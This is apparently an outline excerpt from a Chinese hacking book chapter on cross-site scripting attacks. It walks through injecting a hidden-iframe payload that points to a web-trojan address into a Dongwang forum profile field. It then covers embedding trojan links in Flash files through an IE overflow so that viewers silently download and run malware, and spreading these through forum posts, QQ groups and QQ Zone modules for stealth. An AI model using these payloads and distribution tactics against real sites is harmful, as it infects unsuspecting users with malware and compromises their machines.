文档介绍:黑客攻防秘技实战解析(第2版)
跨网站攻击技术
♂典型的跨站攻击实例演示
♂跨站攻击技术演变
♂邮箱跨站攻击
♂搜索引擎的跨站攻击
典型的跨站攻击实例演示
具体的操作步骤如下:
步骤1:打开动网论坛首页,如图6-1所示。先在论坛注册一个用户,单击【登录】按钮进行登录,登录后的界面如图6-2所示。
典型的跨站攻击实例演示
具体的操作步骤如下:
步骤3:选择【用户控制面板】→【联系资料修改】菜单项,即可打开个人资料修改页面,如图6-3所示。
步骤4:在“论坛密码”栏中输入论坛密码,在“主页地址”栏中输入代码“</Script><IfRA ME height=0 width=0 sRc=”http//网页木马地址”></IFrAME>”。另外,还需要在“MSN号码”栏中输入代码:<Script Language=JavaScript>var actioninfo3='单帖屏蔽',如图6-4所示。
典型的跨站攻击实例演示
具体的操作步骤如下:
步骤5:单击【更新】按钮,即可提交修改资料内容。若提交成功,即可弹出提示信息“你的修改信息已成功提交!”,如图6-5所示。
步骤6:提交成功后返回论坛,回复或新发一篇帖子,帖子的内容可以随意填写。发表成功后再查看新发的帖子,即可发现在新发的帖子页面中已经嵌入了一个网页框架,在框架中显示了“新起点工作室”的页面,如图6-6所示。
跨站攻击技术的演变
不安全的客户端过滤
编辑转换也可以跨站
Flash跳转的跨站攻击
Flash溢出跨站攻击
Flash溢出跨站攻击
步骤1:打开Icode To SWF工具,单击“SWF文件”后面的【选择】按钮,选择本机上某个正常的Flash文件;在“插入代码”栏中填写刚才的网页木马的链接地址。
步骤2:单击【给我插】按钮,即可将网页木马链接插入到正常的Flash文件中了,如图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞,对方打开Flash文件后,就会造成IE溢出,自动访问木马网页在后台下载运行网页中的木马程序。
Flash溢出跨站攻击
***
在新帖页面中单击【插入Flash】按钮,在弹出对话框中输入SWF木马文件的网络链接地址,并设置其尺寸大小,单击【插入】按钮插入Flash文件,如图6-18所示。在发表新帖子后,当有人在QQ群中打开查看这篇帖子时,就会自动播放Flash并在后台下载运行木马服务端了。当然,也可以直接在QQ群中散布SWF木马文件的网址,别人单击后一样会中木马,不过这种方式不如发表帖子隐蔽的效果好,攻击的持续性也不强。
Flash溢出跨站攻击
-Zone溢出跨站
打开QQ空间后,在页面中单击【自定义】按钮,在自定义工具栏中单击【模块】选项卡,单击【新建模块】按钮,在其中选择新建一个Flash模块,在【添加Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址,如图6-19所示。单击【确认】按钮,即可完成模块的添加。在提交自定义模块代码后,用户进入该QQ空间时会自动打开显示上传的SWF木马Flash,从而在后台下载运行木马服务端程序。
邮箱跨站攻击
邮箱跨站的危害
国内主流邮箱跨站漏洞
:163邮箱跨站测试
:126邮箱的跨站测试